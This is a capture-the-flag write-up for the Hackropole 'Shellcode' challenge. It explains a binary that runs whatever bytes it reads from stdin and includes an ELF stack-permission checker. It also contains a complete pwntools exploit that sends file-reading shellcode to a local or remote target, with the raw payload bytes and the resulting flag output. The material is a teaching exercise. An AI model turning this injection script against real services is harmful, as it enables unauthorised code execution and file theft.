Shellcode | Hackropole
Shellcode
Resources
Link: Hackropole/pwn/shellcode
Files:
docker-compose.yml
execut0r
Analysis
Code reading
push rbp
mov rbp,rsp
sub rsp,0x200               ; reserve a 0x200-byte buffer on the stack
lea rax,[rbp-0x200]         ; rax = address of that buffer
mov edx,0x200               ; count = 0x200
mov rsi,rax                 ; buf
mov edi,0x0                 ; fd = 0 (stdin)
call 0x1030 <read@plt>      ; read(0, buf, 0x200)
lea rax,[rbp-0x200]
call rax                    ; jump straight into the bytes just read
We can see from the main function that this is not really a hacking challenge but just a program that reads 0x200 bytes of shellcode into a stack buffer and executes it.
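Calling a stack buffer like this only works when the binary asks the kernel for an executable stack, which is recorded in the ELF PT_GNU_STACK program header. The following check is an added example, not part of the original write-up: it reads that header from an ELF64 image, and the sample image it builds is constructed for the demonstration, not the challenge's execut0r binary.

```python
import struct
import sys

PT_GNU_STACK = 0x6474E551  # p_type of the stack-permission program header
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def stack_is_executable(elf: bytes) -> bool:
    """True if this ELF64 image asks the kernel for an executable stack.

    The disassembled main reads 0x200 bytes into a stack buffer and calls it,
    which only works when the stack is mapped executable (PT_GNU_STACK with
    PF_X set, or no PT_GNU_STACK at all, which Linux on x86-64 treats as
    executable)."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2:  # EI_CLASS 2 == ELFCLASS64
        raise ValueError("not an ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True  # header absent: kernel falls back to an executable stack


def build_sample_elf64(stack_flags: int) -> bytes:
    """Constructed minimal ELF64 image (header + one PT_GNU_STACK entry).

    Hypothetical test input, not the challenge's execut0r binary."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)  # 64-bit, little-endian, v1
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", e_ident,
                       2, 0x3E, 1,      # ET_EXEC, EM_X86_64, EV_CURRENT
                       0, 64, 0, 0,     # e_entry, e_phoff, e_shoff, e_flags
                       64, 56, 1,       # e_ehsize, e_phentsize, e_phnum
                       64, 0, 0)        # e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    image = open(path, "rb").read() if path else build_sample_elf64(PF_R | PF_W | PF_X)
    verdict = "executable (RWE)" if stack_is_executable(image) else "non-executable (RW)"
    print(f"{path or 'constructed sample'}: stack is {verdict}")
```

Run it with the path of a binary to check a real file; a hardened build of the same program (RW stack) would crash at `call rax` instead of running the input.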
Exploit
Our goal is to create a shellcode that will display the content of flag.txt. The simplest way is:
asm(shellcraft.cat("flag.txt"))
Complete exploit:
#!/usr/bin/env python3
from pwn import *
import argparse

context.arch = "amd64"


def get_args():
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("-?", "--help", action="help", help="show this help message and exit")
    parser.add_argument("-t", "--timeout", help="Timeout while receiving response", default=5, type=float)
    parser.add_argument("-l", "--local", help="File path to the binary", type=str)
    parser.add_argument("-p", "--port", help="Remote port", type=int)
    parser.add_argument("-h", "--host", help="Remote host", type=str)
    args = parser.parse_args()
    return args


def main(args):
    if args.local:
        target = process(args.local)
    elif args.host and args.port:
        target = remote(args.host, args.port)
    else:
        # log.error raises, so target is never used undefined
        log.error("give either -l <binary> or -h <host> -p <port>")

    # shellcraft.cat emits open("flag.txt") + sendfile(1, fd, ...) as raw amd64 bytes
    payload = asm(shellcraft.cat("flag.txt"))
    print(f"[>] {payload}")
    target.sendline(payload)
    flag = target.recvuntil(b'}', timeout=args.timeout)
    print(f"[<] {flag}")
    exit(0)


if __name__ == "__main__":
    args = get_args()
    main(args)
Getting the flag
./exploit.py -h 127.0.0.1 -p 4000
[+] Opening connection to 127.0.0.1 on port 4000: Done
[>] b'j\x01\xfe\x0c$H\xb8flag.txtPj\x02XH\x89\xe71\xf6\x0f\x05A\xba\xff\xff\xff\x7fH\x89\xc6j(Xj\x01_\x99\x0f\x05'
[<] b'FCSC{9f8a............................................4f7a}'
[*] Closed connection to 127.0.0.1 port 4000
This post is licensed under CC BY 4.0 by the author.